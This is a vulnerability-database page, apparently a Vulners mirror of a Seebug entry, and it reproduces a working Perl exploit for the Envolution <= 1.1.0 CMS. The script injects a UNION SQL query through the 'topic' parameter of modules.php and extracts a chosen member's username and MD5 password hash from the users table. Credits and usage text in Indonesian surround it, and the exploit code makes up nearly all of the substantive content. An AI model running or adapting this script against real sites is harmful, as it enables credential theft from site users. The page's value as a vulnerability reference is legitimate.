Lucene search
K

Envolution <= 1.1.0 (topic) Remote SQL Injection Exploit

🗓️ 06 Aug 2007 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 21 Views

Remote SQL Injection exploit for Envolution <= 1.1.0 (topic

Code

                                                #!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;

if(@ARGV &lt; 3)
{
    usage();

    exit();
}

$site = $ARGV&#91;0&#93;; # Site Target
$path = $ARGV&#91;1&#93;; # Path direktori envolution_1-0-1
$usid = $ARGV&#91;2&#93;; # member id

$www = new LWP::UserAgent;
$sql = &quot;$site/$path/modules.php?op=modload&amp;name=News&amp;file=index&amp;catid=&amp;topic=2%20and%201=2%20union%20all%20select%201,2,3,concat(pn_uname,0x3a,pn_pass)%20from%20envo_users%20where%20pn_uid=$usid/*&quot;;
print &quot;

 &#91;~&#93; Mencari Username:Password(md5) member id = $usid 
&quot;;
$res = $www -&gt; get($sql) or err();
$res -&gt; content() =~ /&lt;b&gt;(.*)&lt;/b&gt;/ or err();
print &quot;
 &#91;+&#93; Username:Password(md5) member id = $usid  
&quot;;
print &quot;
 &#91;&gt;&#93; $1 

&quot;;

sub usage()
{
print &quot;#############################################################
&quot;;
print &quot;#                      newhack&#91;dot&#93;org                      #
&quot;;
print &quot;#############################################################
&quot;;
print &quot;#        Envolution &lt;= v1.1.0 Remote SQL Injection          #
&quot;;
print &quot;#       http://sourceforge.net/projects/envolution          #
&quot;;
print &quot;#          k1tk4t - newhack&#91;dot&#93;org - Indonesia             #
&quot;;
print &quot;#     cara penggunaan: enov.pl &#91;site&#93; &#91;path&#93; &#91;member id&#93;    #
&quot;;
print &quot;#       contoh: enov.pl http://localhost /html  2           #
&quot;;
print &quot;#-----------------------------------------------------------#
&quot;;
print &quot;# Thanks to; str0ke, xoron, y3dips,                         #
&quot;;
print &quot;# newhack&#91;dot&#93;org staff dan member                          #
&quot;;
print &quot;# mR.opt1lc,fusion,PusHm0v,Ghoz,fl3xu5,bius,iind_id,slackX  #
&quot;;
print &quot;# Semua Komunitas Hacker dan Sekuriti Indonesia;            #
&quot;;
print &quot;#############################################################
&quot;;
}

sub err()
{
print &quot;
 &#91;-&#93; Exploit gagal :( - cari yang lain!&quot;;
exit();
}

# sebug.net
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Aug 2007 00:00Current
7.1High risk
Vulners AI Score7.1
21